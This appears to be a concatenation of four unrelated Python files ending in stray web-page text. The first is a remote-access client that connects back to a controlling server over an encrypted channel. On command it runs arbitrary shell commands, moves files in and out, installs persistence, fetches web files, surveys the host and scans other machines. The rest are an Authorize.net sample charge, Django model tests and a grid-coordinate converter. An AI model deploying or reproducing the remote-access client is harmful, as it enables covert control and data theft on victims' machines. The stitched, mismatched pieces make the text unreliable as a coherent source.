FB_KEY = '82e672ae054aa4de6f042c888111686a'
# generate your own key with...
# python -c "import binascii, os; print(binascii.hexlify(os.urandom(16)))"
def main():
    """Connect back to the server and serve commands until 'kill'.

    A Diffie-Hellman exchange derives the AES-GCM session key; every
    round-trip afterwards goes through crypto.sendGCM/recvGCM.
    """
    s = socket.socket()
    s.connect((HOST, PORT))

    dh_key = crypto.diffiehellman(s)
    GCM = crypto.AES_GCM(dh_key)
    # Per-message counter passed to sendGCM (GCM nonces must never repeat).
    IV = 0
    # NOTE(review): non-blocking mode plus 'if not data: continue' makes
    # this a busy-wait while idle — confirm recvGCM tolerates EWOULDBLOCK.
    s.setblocking(0)

    while True:
        #data = s.recv(1024)
        #data = crypto.AES_decrypt(data, dh_key)
        data = crypto.recvGCM(s, GCM)
        IV += 1
        if not data:
            continue

        # separate prompt into command and action
        cmd, _, action = data.partition(' ')

        # stop client
        if cmd == 'kill':
            s.close()
            sys.exit(0)

        # run command
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True,
                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
            crypto.sendGCM(s, GCM, IV, results)

        # send file
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, GCM, fname)

        # receive file
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, GCM, IV, fname)

        # regenerate DH key
        # NOTE(review): rekey replaces dh_key but GCM keeps using the old
        # key object — confirm whether GCM should be rebuilt here.
        elif cmd == 'rekey':
            dh_key = crypto.diffiehellman(s)

        # apply persistence mechanism
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # download a file from the web
        elif cmd == 'wget':
            results = toolkit.wget(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # unzip a file
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # run system survey
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))

        # run a scan
        elif cmd == 'scan':
            results = scan.single_host(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
# Run the client only when executed directly, not when imported.
if __name__ == '__main__':
    main()
|
import os, sys
import imp
import time
from authorizenet import apicontractsv1
from authorizenet.apicontrollers import *
constants = imp.load_source('modulename', 'constants.py')
from decimal import *
def create_an_accept_payment_transaction(amount):
    """Charge a payment nonce (Accept opaque data) via authCaptureTransaction.

    Fix: boolean results of ``hasattr`` are now tested directly instead of
    being compared with ``== True`` (PEP 8 / E712); behavior is unchanged.

    :param amount: amount to authorize and capture
    :return: the createTransaction API response object, or None
    """
    # Create a merchantAuthenticationType object with authentication details
    # retrieved from the constants file
    merchantAuth = apicontractsv1.merchantAuthenticationType()
    merchantAuth.name = constants.apiLoginId
    merchantAuth.transactionKey = constants.transactionKey

    # Set the transaction's refId
    refId = "ref {}".format(time.time())

    # Create the payment object for a payment nonce
    opaqueData = apicontractsv1.opaqueDataType()
    opaqueData.dataDescriptor = "COMMON.ACCEPT.INAPP.PAYMENT"
    opaqueData.dataValue = "119eyJjb2RlIjoiNTBfMl8wNjAwMDUyN0JEODE4RjQxOUEyRjhGQkIxMkY0MzdGQjAxQUIwRTY2NjhFNEFCN0VENzE4NTUwMjlGRUU0M0JFMENERUIwQzM2M0ExOUEwMDAzNzlGRDNFMjBCODJEMDFCQjkyNEJDIiwidG9rZW4iOiI5NDkwMjMyMTAyOTQwOTk5NDA0NjAzIiwidiI6IjEuMSJ9"

    # Add the payment data to a paymentType object
    paymentOne = apicontractsv1.paymentType()
    paymentOne.opaqueData = opaqueData

    # Create order information
    order = apicontractsv1.orderType()
    order.invoiceNumber = "10101"
    order.description = "Golf Shirts"

    # Set the customer's Bill To address
    customerAddress = apicontractsv1.customerAddressType()
    customerAddress.firstName = "Ellen"
    customerAddress.lastName = "Johnson"
    customerAddress.company = "Souveniropolis"
    customerAddress.address = "14 Main Street"
    customerAddress.city = "Pecan Springs"
    customerAddress.state = "TX"
    customerAddress.zip = "44628"
    customerAddress.country = "USA"

    # Set the customer's identifying information
    customerData = apicontractsv1.customerDataType()
    customerData.type = "individual"
    customerData.id = "99999456654"
    customerData.email = "EllenJohnson@example.com"

    # Add values for transaction settings
    duplicateWindowSetting = apicontractsv1.settingType()
    duplicateWindowSetting.settingName = "duplicateWindow"
    duplicateWindowSetting.settingValue = "600"
    settings = apicontractsv1.ArrayOfSetting()
    settings.setting.append(duplicateWindowSetting)

    # Create a transactionRequestType object and add the previous objects to it
    transactionrequest = apicontractsv1.transactionRequestType()
    transactionrequest.transactionType = "authCaptureTransaction"
    transactionrequest.amount = amount
    transactionrequest.order = order
    transactionrequest.payment = paymentOne
    transactionrequest.billTo = customerAddress
    transactionrequest.customer = customerData
    transactionrequest.transactionSettings = settings

    # Assemble the complete transaction request
    createtransactionrequest = apicontractsv1.createTransactionRequest()
    createtransactionrequest.merchantAuthentication = merchantAuth
    createtransactionrequest.refId = refId
    createtransactionrequest.transactionRequest = transactionrequest

    # Create the controller and get response
    createtransactioncontroller = createTransactionController(createtransactionrequest)
    createtransactioncontroller.execute()
    response = createtransactioncontroller.getresponse()

    if response is not None:
        # Check to see if the API request was successfully received and acted upon
        if response.messages.resultCode == "Ok":
            # Since the API request was successful, look for a transaction response
            # and parse it to display the results of authorizing the card
            if hasattr(response.transactionResponse, 'messages'):
                print('Successfully created transaction with Transaction ID: %s' % response.transactionResponse.transId)
                print('Transaction Response Code: %s' % response.transactionResponse.responseCode)
                print('Message Code: %s' % response.transactionResponse.messages.message[0].code)
                print('Auth Code: %s' % response.transactionResponse.authCode)
                print('Description: %s' % response.transactionResponse.messages.message[0].description)
            else:
                print('Failed Transaction.')
                if hasattr(response.transactionResponse, 'errors'):
                    print('Error Code: %s' % str(response.transactionResponse.errors.error[0].errorCode))
                    print('Error Message: %s' % response.transactionResponse.errors.error[0].errorText)
        # Or, print errors if the API request wasn't successful
        else:
            print('Failed Transaction.')
            if hasattr(response, 'transactionResponse') and hasattr(response.transactionResponse, 'errors'):
                print('Error Code: %s' % str(response.transactionResponse.errors.error[0].errorCode))
                print('Error Message: %s' % response.transactionResponse.errors.error[0].errorText)
            else:
                print('Error Code: %s' % response.messages.message[0]['code'].text)
                print('Error Message: %s' % response.messages.message[0]['text'].text)
    else:
        print('Null Response.')

    return response
# Run only when executed directly: charge the sample amount from constants.py.
if(os.path.basename(__file__) == os.path.basename(sys.argv[0])):
    create_an_accept_payment_transaction(constants.amount)
|
import pytest
from django.core.files.base import ContentFile
from core.models import UL_ORG_ADMIN
from organizations.models import Organization
from publications.models import Platform
from sushi.models import SushiFetchAttempt, SushiCredentials
@pytest.mark.django_db
class TestFileName:
    """Check that ``SushiFetchAttempt.data_file`` names are derived from the
    organization (internal id, or pk as fallback), platform name, counter
    version and report code.
    """

    @pytest.mark.parametrize(
        ('internal_id', 'platform_name', 'version', 'code', 'ext'),
        (
            ('internal1', 'platform_1', 5, 'TR', 'json'),
            (None, 'platform_2', 5, 'TR', 'json'),
            (None, 'platform_1', 4, 'JR1', 'tsv'),
            ('internal2', 'platform_1', 4, 'JR1', 'tsv'),
        ),
    )
    def test_file_name(
        self, counter_report_type_named, internal_id, platform_name, version, code, ext,
    ):
        """The stored file name starts with
        ``counter/<internal_id or org pk>/<platform>/<version>_<code>``.
        """
        counter_report_type = counter_report_type_named(code, version)
        platform = Platform.objects.create(short_name=platform_name, name=platform_name, ext_id=10)
        # Only internal_id matters for the generated file name; the other
        # Organization fields are left to their model defaults.
        organization = Organization.objects.create(
            internal_id=internal_id,
        )
        credentials = SushiCredentials.objects.create(
            organization=organization,
            platform=platform,
            counter_version=version,
            lock_level=UL_ORG_ADMIN,
            url='http://a.b.c/',
        )
        data_file = ContentFile("b")
        data_file.name = f"report.{ext}"
        fetch_attempt = SushiFetchAttempt.objects.create(
            credentials=credentials,
            counter_report=counter_report_type,
            start_date="2020-01-01",
            end_date="2020-02-01",
            data_file=data_file,
            credentials_version_hash=credentials.compute_version_hash(),
        )
        # When the organization has no internal_id, its pk is used instead.
        assert fetch_attempt.data_file.name.startswith(
            f"counter/{internal_id or organization.pk}/{ platform_name }/{ version }_{code}"
        )
@pytest.mark.django_db
class TestSushiFetchAttemptModelManager:
    """Smoke tests that the custom SushiFetchAttempt manager/queryset API exists.

    These only verify the methods can be called without error; they make no
    assertion about the returned querysets.
    """

    def test_custom_manager_methods_exist(self):
        """Custom manager methods exist on the default manager at all."""
        SushiFetchAttempt.objects.all()
        SushiFetchAttempt.objects.current()
        SushiFetchAttempt.objects.current_or_successful()

    def test_custom_manager_methods_exist_on_queryset(self):
        """Custom methods are also available on querysets for SushiFetchAttempts."""
        SushiFetchAttempt.objects.filter(download_success=True).current()
        SushiFetchAttempt.objects.filter(download_success=True).current_or_successful()
|
import numpy as np
from src.settings import gridsize
from src.util import fullcols, colsr, colsc
class convert_coords:
    """
    Converts tkinter canvas coordinates to pandas grid coordinates, and vice versa.

    ``gridsize`` is the number of cells along one edge of the (square) board;
    ``boardsize`` is the board edge length in canvas pixels.
    NOTE(review): class name keeps its original lowercase spelling so existing
    callers are unaffected.
    """

    def __init__(self, gridsize, boardsize) -> None:
        self.gridsize = gridsize
        self.boardsize = boardsize

    def convert_logical_to_grid_position(self, logical_position):
        """Return the canvas-pixel centre of the cell at ``logical_position``."""
        logical_position = np.array(logical_position, dtype=int)
        cell = self.boardsize / self.gridsize  # pixel size of one grid cell
        # Cell origin plus half a cell gives the cell centre.
        return cell * logical_position + cell / 2

    def convert_grid_to_logical_position(self, grid_position):
        """Return the integer cell indices containing canvas point ``grid_position``."""
        grid_position = np.array(grid_position)
        return np.array(grid_position // (self.boardsize / self.gridsize), dtype=int)

    def convert_logical_to_map(self, logical_postion):
        """Convert a logical (column, row) pair to a (row, column-letter) map key.

        NOTE(review): parameter keeps the original "postion" spelling so
        keyword callers are unaffected. Column letters come from ``colsr()``.
        """
        letter = colsr().get(logical_postion[0])
        return (logical_postion[1], letter)

    def convert_map_to_logical(self, map_position):
        """Inverse of ``convert_logical_to_map``: (row, letter) -> [column, row]."""
        number = colsc().get(map_position[1])
        return np.array([number, map_position[0]], dtype=int)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.